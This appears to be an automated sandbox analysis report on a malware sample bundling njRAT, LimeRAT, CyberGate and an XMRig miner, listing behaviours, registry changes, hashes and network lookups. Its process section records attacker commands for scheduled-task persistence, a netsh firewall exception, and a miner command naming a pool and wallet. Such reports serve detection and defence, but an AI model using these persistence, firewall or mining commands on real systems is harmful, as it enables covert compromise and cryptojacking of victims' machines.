Analysis Overview
SHA256
4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
Threat Level: Known bad
The file 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d was found to be: Known bad.
Malicious Activity Summary
xmrig
njRAT/Bladabindi
CyberGate, Rebhip
LimeRAT
XMRig Miner Payload
Modifies Windows Firewall
UPX packed file
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Checks BIOS information in registry
Adds Run key to start application
Maps connected drives based on registry
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
AutoIT Executable
Enumerates physical storage devices
Program crash
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
NTFS ADS
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-05-25 01:11
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-25 01:11
Reported
2022-05-25 01:15
Platform
win7-20220414-en
Max time kernel
151s
Max time network
155s
Command Line
Signatures
CyberGate, Rebhip
LimeRAT
njRAT/Bladabindi
xmrig
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Modifies Windows Firewall
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\moxia.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\moxia.EXE | N/A |
Legitimate hosting services abused for malware hosting/C2
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\winmgmts:\root\cimv2 | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\winmgmts:\root\cimv2 | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
Suspicious use of SetThreadContext
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\efsui\data.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"
C:\Users\Admin\AppData\Local\Temp\moxia.EXE
"C:\Users\Admin\AppData\Local\Temp\moxia.EXE"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Users\Admin\AppData\Local\Temp\li4.exe
"C:\Users\Admin\AppData\Local\Temp\li4.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
C:\Users\Admin\AppData\Local\Temp\n.exe
"C:\Users\Admin\AppData\Local\Temp\n.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
"C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Users\Admin\AppData\Local\Temp\c.exe
"C:\Users\Admin\AppData\Local\Temp\c.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F
C:\Windows\system32\taskeng.exe
taskeng.exe {734AD315-4209-4015-A1BF-8A6AB4AD31E7} S-1-5-21-1819626980-2277161760-1023733287-1000:TBHNEBSE\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | de2.moriaxmr.com | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
| US | 8.8.8.8:53 | red4.hopto.org | udp |
Files
memory/1828-54-0x0000000075741000-0x0000000075743000-memory.dmp
\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
memory/1396-59-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
C:\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
\Users\Admin\AppData\Local\Temp\moxia.EXE
| MD5 | 1a47efc2dcfed8aada82c593e5796257 |
| SHA1 | 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38 |
| SHA256 | b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59 |
| SHA512 | 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f |
memory/932-68-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1692-75-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
C:\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
memory/1820-81-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
